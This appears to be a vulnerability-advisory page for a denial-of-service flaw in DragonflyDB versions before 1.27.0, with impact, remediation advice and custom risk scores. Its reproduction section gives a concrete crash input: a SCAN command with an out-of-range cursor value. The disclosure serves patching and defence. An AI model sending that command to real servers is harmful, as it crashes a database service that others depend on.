Primary

Context

DragonflyDB Denial-of-Service Vulnerability via Crafted Redis Command

Vulnerability

Patched

A denial-of-service vulnerability has been identified in DragonflyDB versions prior to 1.27.0. This issue allows authenticated users to cause the database daemon to crash by sending a specially crafted Redis command. The vulnerability arises because the server does not properly validate the scan cursor in the command, leading to a crash of the Dragonfly service.

Impact

Exploitation of this vulnerability causes the DragonflyDB daemon to crash, disrupting the database service.

Reproduction

The vulnerability can be reproduced by sending the 'SCAN' command with an invalid cursor value, such as '9223372036854775808', which is beyond the valid range. This command will trigger an immediate crash of the DragonflyDB service.

Remediation

Users can upgrade to DragonflyDB version 1.27.0 or later, where this vulnerability has been fixed.

Added: Jun 9, 2025, 7:46 PM

Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread

1.4

impact

2.5

exploitability

6.2

remediation

7.7

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

1.4

impact

2.5

exploitability

6.2

remediation

7.7

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

DragonflyDB Denial-of-Service Vulnerability via Crafted Redis Command

Vulnerability

Impact

Reproduction

Remediation

Affected Products

DragonflyDB Dragonfly

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating